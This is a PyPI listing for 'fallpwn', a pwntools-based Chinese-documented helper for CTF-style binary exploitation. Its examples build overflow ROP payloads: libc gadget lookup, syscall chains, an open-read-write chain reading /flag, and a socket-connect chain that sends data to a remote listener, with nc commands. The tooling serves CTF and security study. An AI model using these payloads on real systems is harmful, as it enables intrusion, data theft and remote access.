A useful tool for userland pwn.

These details have not been verified by PyPI

Project description

[toc]

fallpwn

安装

依赖：

pwntools

使用pip即可

pip install fallpwn

使用

获得gadgets

只需要传入libc的ELF对象，即可直接获得常用gagdet地址

libc.address = libc_base # 使用前先设置libc基地址
finder = GadgetsFinder(libc) # 传入libc的elf对象

gadgets = finder.get_gadgets() # 获得gadgets字典，可以像正常字典一样使用
pop_rdi_ret = gadgets['pop_rdi']
leave_ret = gadgets['leave_ret']

生成常用ROP payload

syscall

生成指定syscall的payload：

payload = b'a'*0x18
payload += rop.syscall(0, 0, elf.bss()+0x400, 0x8)
payload += rop.syscall(1, 1, elf.bss()+0x400, 0x8)

sh.send(payload)
sh.send('/flag\x00')

sh.interactive()

orw

可以生成orw的payload：

# 定义对象
finder = GadgetsFinder(libc)
rop = RopPayload(libc)
# 获得字典
gadgets = finder.get_gadgets()
pop_rdi = gadgets['pop_rdi']

# 生成orw payload
payload = b'a'*0x18
payload += rop.read(libc.address-0x100, 0x10)
payload += rop.ropchain(libc.address-0x100)

sh.send(payload)
sh.send('/flag\x00')

sh.interactive()

此外，rop.ropchain()还有多种参数，例如open可选openat，orw可选sendfile等。

socket + connect +write

可以生成将数据发送到远程监听处，以及生成所需的socket_address的payload：

# 定义对象
finder = GadgetsFinder(libc)
rop = RopPayload(libc)
# 获得字典
gadgets = finder.get_gadgets()

# 发送数据到远程
payload = b'a'*0x18
payload += rop.read(libc.address-0x100, 0x10) # 发送connect所需payload
payload += rop.reverse_shell(libc.address-0x100) # socket + connect
payload += rop.write(gadgets['/bin/sh'], fd=3) # 使用write发送数据

sh.send(payload)
sh.send(rop.get_sockaddr_payload(ip='127.0.0.7', port=9999)) # 发送connect所需payload
sh.interactive()

在指定ip的服务器进行监听即可：

nc -l -vv 9999
# 或nc -l -p 9999

Project details

These details have not been verified by PyPI

Release history Release notifications | RSS feed

This version

0.1.3

Jun 20, 2024

0.1.1

Jun 19, 2024

0.1.0

Jun 19, 2024

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

fallpwn-0.1.3.tar.gz (5.0 kB view details)

Uploaded Jun 20, 2024 Source

Built Distribution

fallpwn-0.1.3-py3-none-any.whl (8.4 kB view details)

Uploaded Jun 20, 2024 Python 3

File details

Details for the file fallpwn-0.1.3.tar.gz.

File metadata

Download URL: fallpwn-0.1.3.tar.gz
Upload date: Jun 20, 2024
Size: 5.0 kB
Tags: Source
Uploaded using Trusted Publishing? No
Uploaded via: twine/5.1.0 CPython/3.10.12

File hashes

Hashes for fallpwn-0.1.3.tar.gz
Algorithm	Hash digest
SHA256	`fd0ee32f3652f3c478a04eacb91e7c266daa6f201e1574fadd2887e8fa8de575`
MD5	`9a2eb215ef168ddca9bf3414f7ebe3cf`
BLAKE2b-256	`89cfc3db9890bcaae116af835d2ee663a7a0c428145da9c373e0b4e4deb1a292`

See more details on using hashes here.

File details

Details for the file fallpwn-0.1.3-py3-none-any.whl.

File metadata

Download URL: fallpwn-0.1.3-py3-none-any.whl
Upload date: Jun 20, 2024
Size: 8.4 kB
Tags: Python 3
Uploaded using Trusted Publishing? No
Uploaded via: twine/5.1.0 CPython/3.10.12

File hashes

Hashes for fallpwn-0.1.3-py3-none-any.whl
Algorithm	Hash digest
SHA256	`1d1da752ad70cc0690f212d11a1c9385f6259111d79b168884bf94211fee0e33`
MD5	`d8ab0e22154e069235a22a0acb6b34a3`
BLAKE2b-256	`3ededb7cc68474b4dd5b465de17730df35464479418e56096b0881b4b731a8c2`